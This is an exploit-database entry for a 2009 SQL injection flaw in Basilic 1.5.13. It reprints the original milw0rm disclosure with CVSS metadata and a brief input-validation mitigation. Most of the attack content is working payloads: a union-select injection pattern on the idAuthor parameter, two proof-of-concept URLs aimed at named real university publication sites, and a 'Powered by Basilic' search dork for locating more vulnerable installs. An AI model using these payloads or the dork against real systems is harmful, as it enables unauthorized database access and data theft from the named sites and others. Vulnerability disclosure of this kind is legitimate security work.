Basilic 1.5.13 SQL Injection Vulnerability

vendor:

Basilic

by:

NoGe

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Basilic

Affected Version From: 1.5.13

Affected Version To: 1.5.13

Patch Exists: YES

Related CWE: N/A

CPE: a:artis:basilic

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Basilic 1.5.13 SQL Injection Vulnerability

Basilic version 1.5.13 is vulnerable to SQL injection. An attacker can send a specially crafted HTTP request to the vulnerable index.php file with a malicious SQL statement which can be used to extract information from the database. An example of a malicious request is http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

==================================================================================================


  [o] Basilic 1.5.13 SQL Injection Vulnerability

       Software : Basilic version 1.5.13
       Vendor   : http://artis.imag.fr/Software/Basilic/
       Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.14.tar.gz
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==================================================================================================


  [o] Vulnerable file


       index.php



  [o] Exploit

       http://localhost/[path]/index.php?idAuthor=[SQL]



  [o] Proof of concept

       http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
       http://www.iarc.uaf.edu/publications/allpubs.php?idAuthor=-19+union+select+1,version()--



  [o] Dork

       "Powered by Basilic"


==================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.net ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================

# milw0rm.com [2009-07-24]